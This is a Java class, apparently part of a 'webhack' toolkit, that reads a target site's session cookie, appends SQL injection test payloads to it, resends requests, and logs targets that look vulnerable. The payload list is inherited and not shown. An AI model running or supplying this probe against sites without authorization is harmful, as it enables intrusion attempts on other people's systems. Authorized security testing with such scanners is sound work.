package webhack.sql;

import java.io.BufferedReader;
import java.io.File;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

public class CookieSQL extends DopSQL {

    public void injectCookie(String targetUrl, File log) {
        String url = "http://"+targetUrl;
        String cookie = getSessionCookie(url);
        if (cookie != null) {
            checkForSQLInjection(url, cookie, log);
        }
    }

    private String getSessionCookie(String url) {
        try {
            HttpURLConnection connection = (HttpURLConnection) new URL(url).openConnection();
            connection.setRequestMethod("GET");

            // Получаем куки из заголовка ответа
            String cookieHeader = connection.getHeaderField("Set-Cookie");
            return cookieHeader != null ? cookieHeader.split(";")[0] : null; // Возвращаем только первую куку
        } catch (Exception e) {
            //System.out.println("Error - " + e);
            return "null";
        }
    }

    private void checkForSQLInjection(String url, String cookie, File log) {
        for (String payload : testPayloads) {
            String testCookieValue = cookie + payload; // Добавляем пейлоад к значению куки

            if (isVulnerable(sendRequest(url, testCookieValue))) {
                System.out.println("($_$>) Potential SQL Injection vulnerability found at: " + url + " | with Cookie | with payload: " + payload);
                zapisLog(log, "($_$>) Potential SQL Injection vulnerability found at: " + url + " | with Cookie | with payload: " + payload);
            }
        }
    }

    private String sendRequest(String testUrl, String cookie) {
        try {
            HttpURLConnection connection = (HttpURLConnection) new URL(testUrl).openConnection();
            connection.setRequestMethod("GET");
            connection.setRequestProperty("Cookie", cookie); // Устанавливаем куки
            connection.setConnectTimeout(5000); // 5 секунд таймаут на соединение
            connection.setReadTimeout(5000); // 5 секунд таймаут на чтение

            BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
            String inputLine;
            StringBuilder response = new StringBuilder();

            while ((inputLine = in.readLine()) != null) {
                response.append(inputLine);
            }
            in.close();

            return response.toString();
        } catch (IOException e) {
            //System.out.println("Error - " + e);
            return "null";
        }
    }


}
